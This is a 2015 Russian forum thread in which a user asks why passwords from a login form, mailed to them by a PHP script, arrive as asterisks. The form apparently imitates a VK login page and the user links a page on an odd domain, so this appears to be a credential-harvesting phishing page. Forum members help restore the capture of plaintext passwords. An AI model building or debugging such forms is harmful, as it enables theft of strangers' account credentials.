Форум программистов, компьютерный форум, киберфорум
Наши страницы
jQuery
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.60/5: Рейтинг темы: голосов - 5, средняя оценка - 4.60
Wynikq
0 / 0 / 0
Регистрация: 03.10.2015
Сообщений: 22
1

При отправке данных с формы на почту, из-за Jquery, там где type="password" приходят не символы, а "****"

03.10.2015, 12:15. Просмотров 847. Ответов 11
Метки нет (Все метки)

HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; Charset=Windows-1251">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
 
<script src="jquery-2.1.4.js"></script> 
 
</head>
</html>
<body >
<form method="POST" id="login_submit" action="file.php">
Логин<br>
<input type="text" class="form_input" name="email" value="">
<div class="form_header">Пароль</div>
<input type="password" class="form_input" name="pass" id="pass"/>
<div class="popup_login_btn">
<button class="flat_button popup_login_btn button_big" id="compare" type="submit" name="submit" value="2" >Войти</button>
</div>
<input type="submit" name="submit" style="display: none;" >
</form>
 
 
 
 
 
<script type="text/javascript" src="http://brizing.uweb.ru/js/jquery.cookie.js"></script>
</body>
</html>
Если убрать jquery - то проблема исчезнет, но она мне жизненно необходима. На почту приходит что-то типу такого - http://cs627819.vk.me/v627819568/19ee7/sayJcNi5v84.jpg
Помогите, пожалуйста) гугль не справился
0
Лучшие ответы (1)
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
03.10.2015, 12:15
Ответы с готовыми решениями:

Jquery не позволяет вытащить содержимое из type="password" в виде обычных символов и цифр
&lt;html&gt; &lt;head&gt; &lt;meta charset=&quot;utf-8&quot;&gt; &lt;/head&gt; &lt;body&gt; &lt;input type=&quot;text&quot;...

Jquery не позволяет вытащить содержимое из type="password" в виде обычных символов и цифр
&lt;html&gt; &lt;head&gt; &lt;meta charset=&quot;utf-8&quot;&gt; &lt;/head&gt; &lt;body&gt; &lt;input type=&quot;text&quot;...

Как написать регулярное выражение для выдергивания английских букв и символов: "+", ",", ":", "-", " ", "!", "?" и "."
Не могу ни как собразить как написать регулярное выражение для выдергивания английских букв и...

Получить значение из {"text1":"val1","text2":"val2","text3":{"text":"val"}}
Есть такая строка var my = '{&quot;text1&quot;:&quot;val1&quot;,&quot;text2&quot;:&quot;val2&quot;,&quot;text3&quot;:{&quot;text&quot;:&quot;val&quot;}}'; Как из...

Тип даных JQuery var ["dffd","dfdf","fffd"]
Работаю с типом таким var availableTags = ; если использую source: availableTags то...

11
Silver22
41 / 41 / 31
Регистрация: 22.09.2015
Сообщений: 186
03.10.2015, 12:28 2
Wynikq, сделайте скрытый input, в который будете записывать пароль при вводе его в основное поле и отправляйте данные с этого инпута на почту. Jquery не позволяет вытащить содержимое из type="password" в виде обычных символов и цифр
0
Wynikq
0 / 0 / 0
Регистрация: 03.10.2015
Сообщений: 22
03.10.2015, 12:34  [ТС] 3
Это оказалось не кроссбраузерно, во многих не работает, а в остальных - просто криво(ту тему создавал я, после полной очистки браузера пароль был утерян).
Могу даже видео снять...
Нету другого способа?
0
Silver22
41 / 41 / 31
Регистрация: 22.09.2015
Сообщений: 186
03.10.2015, 12:37 4
Wynikq, А в каких браузерах у вас не работал тот код?
0
Wynikq
0 / 0 / 0
Регистрация: 03.10.2015
Сообщений: 22
03.10.2015, 12:48  [ТС] 5
Понимаете, там такое дело, назвать его рабочим очень сложно... Минут через 15 скину видео, там вообще происходит магия.

Добавлено через 9 минут
Только что снял и залил - https://www.youtube.com/watch?v=UAHzGH_QDm0&feature=youtu.be
Если просто вводить символы, допустим "твцфоошщвфц" - то выдаст "********". Если же зажать один символ и тупо спамить, допустим "фффффффффф" или "2222222222" - то его он высветит. То есть главное зажать один и тот же, чтобы его выбило. Это относится ко всем браузерам кроме IE...
0
Silver22
41 / 41 / 31
Регистрация: 22.09.2015
Сообщений: 186
03.10.2015, 12:52 6
Wynikq, странно. а на keyup пробовали событие вешать? просто в JSfiddle работает всё и с разных браузеров http://jsfiddle.net/92y6b/97/
1
Wynikq
0 / 0 / 0
Регистрация: 03.10.2015
Сообщений: 22
03.10.2015, 12:57  [ТС] 7
Нет, не пробовал. Типу сделать, что при нажатии определённой клавиши в скрытое поле вбивался соответствующий символ и потом его через форму отправлять? Идея хорошая, можно ли в интернете найти уже готовый скрипт?
А если начать писать его самому, много ли это времени займёт?
0
Silver22
41 / 41 / 31
Регистрация: 22.09.2015
Сообщений: 186
03.10.2015, 12:58 8
Wynikq, я же вам ссылку выше скинул, только там в div передаётся текст
0
Wynikq
0 / 0 / 0
Регистрация: 03.10.2015
Сообщений: 22
03.10.2015, 12:59  [ТС] 9
Оу, я так понял, это и есть keyup - http://jsfiddle.net/92y6b/97/
Просто никогда с ним не работал)

Добавлено через 39 секунд
Хорошо, спасибо, вечерком обязательно попробую.
0
Lazy_Den
3034 / 2677 / 1353
Регистрация: 15.01.2014
Сообщений: 5,883
03.10.2015, 13:29 10
Лучший ответ Сообщение было отмечено Wynikq как решение

Решение

Wynikq, скачайте и подключите последнюю версию плагина jquery.cookie и би хэппи (пардон, что на чистейшем английском). Где вы вообще откопали это старьё 5-тилетней давности?
И кто туда дописал вот это?
Javascript
1
2
3
4
5
6
7
8
$('[type="password"]').keyup(function () {
    var len = $(this).val().length,
        i = 0;
    $(this).val('')
    for (i; i < len; i += 1) {
        $(this).val( $(this).val() + '*' );
    }
});
1
Wynikq
0 / 0 / 0
Регистрация: 03.10.2015
Сообщений: 22
03.10.2015, 14:12  [ТС] 11
Я сам анскилл, попросил помощи, надо было кое-что сделать, так он мне через куки решил проблему №1, после чего и появилась проблема №2. Сейчас удалил это из куки и всё работает отлично!!!
ОГРОМНОЕ ТЕБЕ СПАСИБО!!!

Добавлено через 33 минуты
Кстати, теперь, после редактирования cookie, http://albums-14208295.ru/error/input.html - работает отлично.
0
Donald28
странник
810 / 481 / 108
Регистрация: 28.05.2012
Сообщений: 1,516
Записей в блоге: 2
04.10.2015, 14:37 12
Если отправляешь данные на сервер через ajax. То можно воспользоваться следующим образом (обязательно должен быть POST запрос, чтобы отправлялись данные из input[type=password]):
HTML5
1
2
3
4
<form id='form'>
    <input type='password' name="pass"/>
    <button id="hello">Hello</button>
</form>
Javascript
1
2
3
4
5
6
7
8
9
10
$('#hello').click(function(){
    $.ajax({
        url: "to_server.php",
        method: 'POST',
        data: $('#form').serialize(),
        success: function( data ){ // обработка успешности запроса
              alert(data);
        },
    });
});
0
04.10.2015, 14:37
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
04.10.2015, 14:37

<input type="Image" name="send" src="send.gif"> - скрипт не работает
LUDI SCRIPT NE RABOTAET, GDE OSHIBKA. ESLI EST' PREDLOJENIYA NA JAVA SCRIPT NE OTKOJUS' &lt;html&gt;...

Создание браузерной CAD, "math scetchpad", "Geogebra", "Живая геометрия""
Создаю браузерную версию CAD системы, для обучения школьников стереометрии и планиметрии, что-то...

Создать программу такую, что пользователь вводит число, а мы ему выдаём "-лет" или "-год" "-года"
4)Создать программу такую, что пользователь вводит число, а мы ему выдаём &quot;-лет&quot; или &quot;-год&quot; &quot;-года&quot;.


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
12
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2019, vBulletin Solutions, Inc.
Рейтинг@Mail.ru